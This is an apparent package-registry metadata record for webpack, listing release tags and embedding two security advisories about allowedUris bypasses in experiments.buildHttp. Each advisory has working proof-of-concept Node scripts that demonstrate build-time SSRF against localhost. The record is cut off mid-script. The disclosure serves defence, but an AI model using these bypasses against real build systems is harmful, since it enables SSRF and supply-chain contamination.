rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-31T19:17:33.427Z","dependent_packages_count":216244,"downloads":226195831,"downloads_period":"last-month","dependent_repos_count":3177,"rankings":{"downloads":0.01286851878420425,"dependent_repos_count":0.38676743903333877,"dependent_packages_count":0.000191658790403042,"stargazers_count":0.07759443028603158,"forks_count":0.39262672205423177,"docker_downloads_count":0.012101883622592081,"average":0.14702510876180025},"purl":"pkg:npm/webpack","advisories":[{"uuid":"GSA_kwCzR0hTQS04ZmdjLTdjYzYtcng3eM4ABR_8","url":"https://github.com/advisories/GHSA-8fgc-7cc6-rx7x","title":"webpack buildHttp: allowedUris allow-list bypass via URL userinfo (@) leading to build-time SSRF behavior","description":"### Summary\nWhen `experiments.buildHttp` is enabled, webpack’s HTTP(S) resolver (`HttpUriPlugin`) can be bypassed to fetch resources from **hosts outside `allowedUris`** by using crafted URLs that include **userinfo** (`username:password@host`). If `allowedUris` enforcement relies on a **raw string prefix check** (e.g., `uri.startsWith(allowed)`), a URL that *looks* allow-listed can pass validation while the actual network request is sent to a different authority/host after URL parsing. This is a **policy/allow-list bypass** that enables **build-time SSRF behavior** (outbound requests from the build machine to internal-only endpoints, depending on network access) and **untrusted content inclusion** (the fetched response is treated as module source and bundled). In my reproduction, the internal response was also persisted in the buildHttp cache.\n\nReproduced on:\n- webpack version: **5.104.0**\n- Node version: **v18.19.1**\n\n### Details\n**Root cause (high level):** `allowedUris` validation can be performed on the raw URI string, while the actual request destination is determined later by parsing the URL (e.g., `new URL(uri)`), which interprets the **authority** as the part after `@`.\n\nExample crafted URL:\n- `http://127.0.0.1:9000@127.0.0.1:9100/secret.js`\n\nIf the allow-list is `[\"http://127.0.0.1:9000\"]`, then:\n- Raw string check:  \n  `crafted.startsWith(\"http://127.0.0.1:9000\")` → **true**\n- URL parsing (WHAT `new URL()` will contact):  \n  `origin` → `http://127.0.0.1:9100` (host/port after `@`)\n\nAs a result, webpack fetches `http://127.0.0.1:9100/secret.js` even though `allowedUris` only included `http://127.0.0.1:9000`.\n\n**Evidence from reproduction:**\n- Server logs showed the internal-only endpoint being fetched:\n  - `[internal] 200 /secret.js served (...)` (observed multiple times)\n- Attacker-side build output showed:\n  - the internal secret marker was present in the **bundle**\n  - the internal secret marker was present in the **buildHttp cache**\n\n\u003cimg width=\"1651\" height=\"381\" alt=\"image-2\" src=\"https://github.com/user-attachments/assets/8fd81b35-0d4f-424b-b60e-0a2582a8b492\" /\u003e\n\n### PoC\nThis PoC is intentionally constrained to **127.0.0.1** (localhost-only “internal service”) to demonstrate SSRF behavior safely.\n\n#### 1) Setup\n```bash\nmkdir split-userinfo-poc \u0026\u0026 cd split-userinfo-poc\nnpm init -y\nnpm i -D webpack webpack-cli\n```\n\n#### 2) Create server.js\n```js\n#!/usr/bin/env node\n\"use strict\";\n\nconst http = require(\"http\");\n\nconst ALLOWED_PORT = 9000;   // allowlisted-looking host\nconst INTERNAL_PORT = 9100;  // actual target if bypass succeeds\n\nconst secret = `INTERNAL_ONLY_SECRET_${Math.random().toString(16).slice(2)}`;\nconst internalPayload =\n  `// internal-only\\n` +\n  `export const secret = ${JSON.stringify(secret)};\\n` +\n  `export default \"ok\";\\n`;\n\nfunction listen(port, handler) {\n  return new Promise(resolve =\u003e {\n    const s = http.createServer(handler);\n    s.listen(port, \"127.0.0.1\", () =\u003e resolve(s));\n  });\n}\n\n(async () =\u003e {\n  // \"Allowed\" host (should NOT be contacted if bypass works as intended)\n  await listen(ALLOWED_PORT, (req, res) =\u003e {\n    console.log(`[allowed-host] ${req.method} ${req.url} (should NOT be hit in userinfo bypass)`);\n    res.statusCode = 200;\n    res.setHeader(\"Content-Type\", \"application/javascript; charset=utf-8\");\n    res.end(`export default \"ALLOWED_HOST_WAS_HIT_UNEXPECTEDLY\";\\n`);\n  });\n\n  // Internal-only service (SSRF-like target)\n  await listen(INTERNAL_PORT, (req, res) =\u003e {\n    if (req.url === \"/secret.js\") {\n      console.log(`[internal] 200 /secret.js served (secret=${secret})`);\n      res.statusCode = 200;\n      res.setHeader(\"Content-Type\", \"application/javascript; charset=utf-8\");\n      res.end(internalPayload);\n      return;\n    }\n    console.log(`[internal] 404 ${req.method} ${req.url}`);\n    res.statusCode = 404;\n    res.end(\"not found\");\n  });\n\n  console.log(\"\\nServers up:\");\n  console.log(`- allowed-host (should NOT be contacted): http://127.0.0.1:${ALLOWED_PORT}/`);\n  console.log(`- internal target (should be contacted if vulnerable): http://127.0.0.1:${INTERNAL_PORT}/secret.js`);\n})();\n```\n\n#### 2) Create server.js\n```js\n#!/usr/bin/env node\n\"use strict\";\n\nconst path = require(\"path\");\nconst os = require(\"os\");\nconst fs = require(\"fs/promises\");\nconst webpack = require(\"webpack\");\n\nfunction fmtBool(b) { return b ? \"✅\" : \"❌\"; }\n\nasync function walk(dir) {\n  const out = [];\n  let items;\n  try { items = await fs.readdir(dir, { withFileTypes: true }); }\n  catch { return out; }\n  for (const it of items) {\n    const p = path.join(dir, it.name);\n    if (it.isDirectory()) out.push(...await walk(p));\n    else if (it.isFile()) out.push(p);\n  }\n  return out;\n}\n\nasync function fileContains(f, needle) {\n  try {\n    const buf = await fs.readFile(f);\n    const s1 = buf.toString(\"utf8\");\n    if (s1.includes(needle)) return true;\n    const s2 = buf.toString(\"latin1\");\n    return s2.includes(needle);\n  } catch {\n    return false;\n  }\n}\n\n(async () =\u003e {\n  const webpackVersion = require(\"webpack/package.json\").version;\n\n  const ALLOWED_PORT = 9000;\n  const INTERNAL_PORT = 9100;\n\n  // NOTE: allowlist is intentionally specified without a trailing slash\n  // to demonstrate the risk of raw string prefix checks.\n  const allowedUri = `http://127.0.0.1:${ALLOWED_PORT}`;\n\n  // Crafted URL using userinfo so that:\n  // - The string begins with allowedUri\n  // - The actual authority (host:port) after '@' is INTERNAL_PORT\n  const crafted = `http://127.0.0.1:${ALLOWED_PORT}@127.0.0.1:${INTERNAL_PORT}/secret.js`;\n  const parsed = new URL(crafted);\n\n  const tmp = await fs.mkdtemp(path.join(os.tmpdir(), \"webpack-httpuri-userinfo-poc-\"));\n  const srcDir = path.join(tmp, \"src\");\n  const distDir = path.join(tmp, \"dist\");\n  const cacheDir = path.join(tmp, \".buildHttp-cache\");\n  const lockfile = path.join(tmp, \"webpack.lock\");\n  const bundlePath = path.join(distDir, \"bundle.js\");\n\n  await fs.mkdir(srcDir, { recursive: true });\n  await fs.mkdir(distDir, { recursive: true });\n\n  await fs.writeFile(\n    path.join(srcDir, \"index.js\"),\n    `import { secret } from ${JSON.stringify(crafted)};\nconsole.log(\"LEAKED_SECRET:\", secret);\nexport default secret;\n`\n  );\n\n  const config = {\n    context: tmp,\n    mode: \"development\",\n    entry: \"./src/index.js\",\n    output: { path: distDir, filename: \"bundle.js\" },\n    experiments: {\n      buildHttp: {\n        allowedUris: [allowedUri],\n        cacheLocation: cacheDir,\n        lockfileLocation: lockfile,\n        upgrade: true\n      }\n    }\n  };\n\n  console.log(\"\\n[ENV]\");\n  console.log(`- webpack version: ${webpackVersion}`);\n  console.log(`- node version:    ${process.version}`);\n  console.log(`- allowedUris:     ${JSON.stringify([allowedUri])}`);\n\n  console.log(\"\\n[CRAFTED URL]\");\n  console.log(`- import specifier: ${crafted}`);\n  console.log(`- WHAT startsWith() sees: begins with \"${allowedUri}\" =\u003e ${fmtBool(crafted.startsWith(allowedUri))}`);\n  console.log(`- WHAT URL() parses:`);\n  console.log(`  - username: ${JSON.stringify(parsed.username)} (userinfo)`);\n  console.log(`  - password: ${JSON.stringify(parsed.password)} (userinfo)`);\n  console.log(`  - hostname: ${parsed.hostname}`);\n  console.log(`  - port:     ${parsed.port}`);\n  console.log(`  - origin:   ${parsed.origin}`);\n  console.log(`  - NOTE: request goes to origin above (host/port after @), not to \"${allowedUri}\"`);\n\n  const compiler = webpack(config);\n\n  compiler.run(async (err, stats) =\u003e {\n    try {\n      if (err) throw err;\n      const info = stats.toJson({ all: false, errors: true, warnings: true });\n\n      if (stats.hasErrors()) {\n        console.error(\"\\n[WEBPACK ERRORS]\");\n        console.error(info.errors);\n        process.exitCode = 1;\n        return;\n      }\n\n      const bundle = await fs.readFile(bundlePath, \"utf8\");\n      const m = bundle.match(/INTERNAL_ONLY_SECRET_[0-9a-f]+/i);\n      const foundSecret = m ? m[0] : null;\n\n      console.log(\"\\n[RESULT]\");\n      console.log(`- temp dir:  ${tmp}`);\n      console.log(`- bundle:    ${bundlePath}`);\n      console.log(`- lockfile:  ${lockfile}`);\n      console.log(`- cacheDir:  ${cacheDir}`);\n\n      console.log(\"\\n[SECURITY CHECK]\");\n      console.log(`- bundle contains INTERNAL_ONLY_SECRET_* : ${fmtBool(!!foundSecret)}`);\n\n      if (foundSecret) {\n        const lockHit = await fileContains(lockfile, foundSecret);\n\n        const cacheFiles = await walk(cacheDir);\n        let cacheHit = false;\n        for (const f of cacheFiles) {\n          if (await fileContains(f, foundSecret)) { cacheHit = true; break; }\n        }\n\n        console.log(`- lockfile contains secret: ${fmtBool(lockHit)}`);\n        console.log(`- cache contains secret:    ${fmtBool(cacheHit)}`);\n      }\n    } catch (e) {\n      console.error(e);\n      process.exitCode = 1;\n    } finally {\n      compiler.close(() =\u003e {});\n    }\n  });\n})();\n```\n\n\n#### 4) Run\nTerminal A:\n```bash\nnode server.js\n```\n\nTerminal B:\n```bash\nnode attacker.js\n```\n\n#### 5) Expected vs Actual\n\nExpected: The import should be blocked because the effective request destination is http://127.0.0.1:9100/secret.js, which is outside allowedUris (only http://127.0.0.1:9000 is allow-listed).\n\nActual: The crafted URL passes the allow-list prefix validation, webpack fetches the internal-only resource on port 9100 (confirmed by server logs), and the secret marker appears in the bundle and buildHttp cache.\n\n### Impact\n\nVulnerability class: Policy/allow-list bypass leading to build-time SSRF behavior and untrusted content inclusion in build outputs.\n\nWho is impacted: Projects that enable experiments.buildHttp and rely on allowedUris as a security boundary. If an attacker can influence the imported HTTP(S) specifier (e.g., via source contribution, dependency manipulation, or configuration), they can cause outbound requests from the build environment to endpoints outside the allow-list (including internal-only services, subject to network reachability). The fetched response can be treated as module source and included in build outputs and persisted in the buildHttp cache, increasing the risk of leakage or supply-chain contamination.","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-02-05T18:38:10.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N","references":["https://github.com/webpack/webpack/security/advisories/GHSA-8fgc-7cc6-rx7x","https://nvd.nist.gov/vuln/detail/CVE-2025-68458","https://github.com/advisories/GHSA-8fgc-7cc6-rx7x"],"source_kind":"github","identifiers":["GHSA-8fgc-7cc6-rx7x","CVE-2025-68458"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-05T19:00:07.540Z","updated_at":"2026-09-03T02:04:19.977Z","epss_percentage":0.002,"epss_percentile":0.09865,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04ZmdjLTdjYzYtcng3eM4ABR_8","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04ZmdjLTdjYzYtcng3eM4ABR_8","packages":[{"ecosystem":"npm","package_name":"webpack","versions":[{"first_patched_version":"5.104.1","vulnerable_version_range":"\u003e= 5.49.0, \u003c= 5.104.0"}],"purl":"pkg:npm/webpack"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04ZmdjLTdjYzYtcng3eM4ABR_8/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zOHI3LTc5NGgtNTc1OM4ABR_7","url":"https://github.com/advisories/GHSA-38r7-794h-5758","title":"webpack buildHttp HttpUriPlugin allowedUris bypass via HTTP redirects → SSRF + cache persistence","description":"### Summary\nWhen `experiments.buildHttp` is enabled, webpack’s HTTP(S) resolver (`HttpUriPlugin`) enforces `allowedUris` only for the **initial** URL, but **does not re-validate `allowedUris` after following HTTP 30x redirects**. As a result, an import that appears restricted to a trusted allow-list can be redirected to **HTTP(S) URLs outside the allow-list**. This is a **policy/allow-list bypass** that enables **build-time SSRF behavior** (requests from the build machine to internal-only endpoints, depending on network access) and **untrusted content inclusion in build outputs** (redirected content is treated as module source and bundled). In my reproduction, the internal response is also persisted in the buildHttp cache.\n\n### Details\nIn the HTTP scheme resolver, the allow-list check (`allowedUris`) is performed when metadata/info is created for the original request (via `getInfo()`), but the content-fetch path follows redirects by resolving the `Location` URL without re-checking whether the redirected URL is within `allowedUris`.\n\nPractical consequence: if an “allowed” host/path can return a 302 (or has an open redirect), it can point to an external URL or an internal-only URL (SSRF). The redirected response is consumed as module content, bundled, and can be cached. If the redirect target is attacker-controlled, this can potentially result in attacker-controlled JavaScript being bundled and later executed when the resulting bundle runs.\n\n**Figure 1 (evidence screenshot):** left pane shows the allowed host issuing a 302 redirect to `http://127.0.0.1:9100/secret.js`; right pane shows the build output confirming allow-list bypass and that the secret appears in the bundle and buildHttp cache.\n\n\u003cimg width=\"1648\" height=\"461\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bb25f3ff-1919-49f9-951b-ad50bf0c7524\" /\u003e\n\n\n### PoC\nThis PoC is intentionally constrained to **127.0.0.1** (localhost-only “internal service”) to demonstrate SSRF behavior safely.\n\n#### 1) Setup\n```bash\nmkdir split-ssrf-poc \u0026\u0026 cd split-ssrf-poc\nnpm init -y\nnpm i -D webpack webpack-cli\n```\n\n#### 2) Create server.js\n```js\n#!/usr/bin/env node\n\"use strict\";\n\nconst http = require(\"http\");\nconst url = require(\"url\");\n\nconst allowedPort = 9000;\nconst internalPort = 9100;\n\nconst internalUrlDefault = `http://127.0.0.1:${internalPort}/secret.js`;\nconst secret = `INTERNAL_ONLY_SECRET_${Math.random().toString(16).slice(2)}`;\nconst internalPayload =\n  `export const secret = ${JSON.stringify(secret)};\\n` +\n  `export default \"ok\";\\n`;\n\nfunction start(port, handler) {\n  return new Promise(resolve =\u003e {\n    const s = http.createServer(handler);\n    s.listen(port, \"127.0.0.1\", () =\u003e resolve(s));\n  });\n}\n\n(async () =\u003e {\n  // Internal-only service (SSRF target)\n  await start(internalPort, (req, res) =\u003e {\n    if (req.url === \"/secret.js\") {\n      res.statusCode = 200;\n      res.setHeader(\"Content-Type\", \"application/javascript; charset=utf-8\");\n      res.end(internalPayload);\n      console.log(`[internal] 200 /secret.js served (secret=${secret})`);\n      return;\n    }\n    res.statusCode = 404;\n    res.end(\"not found\");\n  });\n\n  // Allowed host (redirector)\n  await start(allowedPort, (req, res) =\u003e {\n    const parsed = url.parse(req.url, true);\n\n    if (parsed.pathname === \"/redirect.js\") {\n      const to = parsed.query.to || internalUrlDefault;\n\n      // Safety guard: only allow redirecting to localhost internal service in this PoC\n      if (!to.startsWith(`http://127.0.0.1:${internalPort}/`)) {\n        res.statusCode = 400;\n        res.end(\"to must be internal-only in this PoC\");\n        console.log(`[allowed] blocked redirect to: ${to}`);\n        return;\n      }\n\n      res.statusCode = 302;\n      res.setHeader(\"Location\", to);\n      res.end(\"redirecting\");\n      console.log(`[allowed] 302 /redirect.js -\u003e ${to}`);\n      return;\n    }\n\n    res.statusCode = 404;\n    res.end(\"not found\");\n  });\n\n  console.log(`\\nServer running:`);\n  console.log(`- allowed host:  http://127.0.0.1:${allowedPort}/redirect.js`);\n  console.log(`- internal-only: http://127.0.0.1:${internalPort}/secret.js`);\n})();\n```\n\n#### 3) Create attacker.js\n```js\n#!/usr/bin/env node\n\"use strict\";\n\nconst path = require(\"path\");\nconst os = require(\"os\");\nconst fs = require(\"fs/promises\");\nconst webpack = require(\"webpack\");\nconst webpackPkg = require(\"webpack/package.json\");\n\nconst allowedPort = 9000;\nconst internalPort = 9100;\n\nconst allowedBase = `http://127.0.0.1:${allowedPort}/`;\nconst internalTarget = `http://127.0.0.1:${internalPort}/secret.js`;\nconst entryUrl = `${allowedBase}redirect.js?to=${encodeURIComponent(internalTarget)}`;\n\nasync function walk(dir) {\n  const out = [];\n  const items = await fs.readdir(dir, { withFileTypes: true });\n  for (const it of items) {\n    const p = path.join(dir, it.name);\n    if (it.isDirectory()) out.push(...await walk(p));\n    else if (it.isFile()) out.push(p);\n  }\n  return out;\n}\n\nasync function fileContains(f, needle) {\n  try {\n    const buf = await fs.readFile(f);\n    return buf.toString(\"utf8\").includes(needle) || buf.toString(\"latin1\").includes(needle);\n  } catch {\n    return false;\n  }\n}\n\nasync function findInFiles(files, needle) {\n  const hits = [];\n  for (const f of files) if (await fileContains(f, needle)) hits.push(f);\n  return hits;\n}\n\nconst fmtBool = b =\u003e (b ? \"✅\" : \"❌\");\n\n(async () =\u003e {\n  const tmp = await fs.mkdtemp(path.join(os.tmpdir(), \"webpack-attacker-\"));\n  const srcDir = path.join(tmp, \"src\");\n  const distDir = path.join(tmp, \"dist\");\n  const cacheDir = path.join(tmp, \".buildHttp-cache\");\n  const lockfile = path.join(tmp, \"webpack.lock\");\n  const bundlePath = path.join(distDir, \"bundle.js\");\n\n  await fs.mkdir(srcDir, { recursive: true });\n  await fs.mkdir(distDir, { recursive: true });\n\n  await fs.writeFile(\n    path.join(srcDir, \"index.js\"),\n    `import { secret } from ${JSON.stringify(entryUrl)};\nconsole.log(\"LEAKED_SECRET:\", secret);\nexport default secret;\n`\n  );\n\n  const config = {\n    context: tmp,\n    mode: \"development\",\n    entry: \"./src/index.js\",\n    output: { path: distDir, filename: \"bundle.js\" },\n    experiments: {\n      buildHttp: {\n        allowedUris: [allowedBase],\n        cacheLocation: cacheDir,\n        lockfileLocation: lockfile,\n        upgrade: true\n      }\n    }\n  };\n\n  const compiler = webpack(config);\n\n  compiler.run(async (err, stats) =\u003e {\n    try {\n      if (err) throw err;\n\n      const info = stats.toJson({ all: false, errors: true, warnings: true });\n      if (stats.hasErrors()) {\n        console.error(info.errors);\n        process.exitCode = 1;\n        return;\n      }\n\n      const bundle = await fs.readFile(bundlePath, \"utf8\");\n      const m = bundle.match(/INTERNAL_ONLY_SECRET_[0-9a-f]+/i);\n      const secret = m ? m[0] : null;\n\n      console.log(\"\\n[ATTACKER RESULT]\");\n      console.log(`- webpack version: ${webpackPkg.version}`);\n      console.log(`- node version: ${process.version}`);\n      console.log(`- allowedUris: ${JSON.stringify([allowedBase])}`);\n      console.log(`- imported URL (allowed only): ${entryUrl}`);\n      console.log(`- temp dir: ${tmp}`);\n      console.log(`- lockfile: ${lockfile}`);\n      console.log(`- cacheDir: ${cacheDir}`);\n      console.log(`- bundle:   ${bundlePath}`);\n\n      if (!secret) {\n        console.log(\"\\n[SECURITY SUMMARY]\");\n        console.log(`- bundle contains internal secret marker: ${fmtBool(false)}`);\n        return;\n      }\n\n      const lockHit = await fileContains(lockfile, secret);\n\n      let cacheFiles = [];\n      try { cacheFiles = await walk(cacheDir); } catch { cacheFiles = []; }\n      const cacheHit = cacheFiles.length ? (await findInFiles(cacheFiles, secret)).length \u003e 0 : false;\n\n      const allTmpFiles = await walk(tmp);\n      const allHits = await findInFiles(allTmpFiles, secret);\n\n      console.log(`\\n- extracted secret marker from bundle: ${secret}`);\n\n      console.log(\"\\n[SECURITY SUMMARY]\");\n      console.log(`- Redirect allow-list bypass: ${fmtBool(true)} (imported allowed URL, but internal target was fetched)`);\n      console.log(`- Internal target (SSRF-like): ${internalTarget}`);\n      console.log(`- EXPECTED: internal target should be BLOCKED by allowedUris`);\n      console.log(`- ACTUAL: internal content treated as module and bundled`);\n\n      console.log(\"\\n[EVIDENCE CHECKLIST]\");\n      console.log(`- bundle contains secret:   ${fmtBool(true)}`);\n      console.log(`- cache 